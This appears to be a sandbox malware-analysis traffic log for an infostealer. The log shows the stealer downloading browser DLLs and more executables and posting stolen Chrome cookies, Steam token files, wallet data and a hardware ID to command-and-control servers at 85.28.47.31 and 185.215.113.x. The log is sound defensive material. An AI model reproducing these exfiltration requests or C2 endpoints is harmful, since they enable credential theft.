44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="message"fplugins------DBGHJEBKJEGHJKECAAKJ--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEHost: 85.28.47.31Content-Length: 7211Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKFHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file"------HDAKFCGIJKJKFHIDHIII--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 2d 2d 0d 0a Data Ascii: ------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="file"------FHIJJJKKJJDAKEBFIJDH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="message"wallets------HIIIECAAKECFHIECBKJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"ybncbhylepme------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="file"------JDBGDHIIDAEBFHJJDBFI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"files------KJECFHCBKKEBAKFIJDHI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJECAAEHCFIEBGCBGHIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="hwid"B125E89D806E2371543510------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="build"sila------GIIJEBAECGCBKECAAAEB--
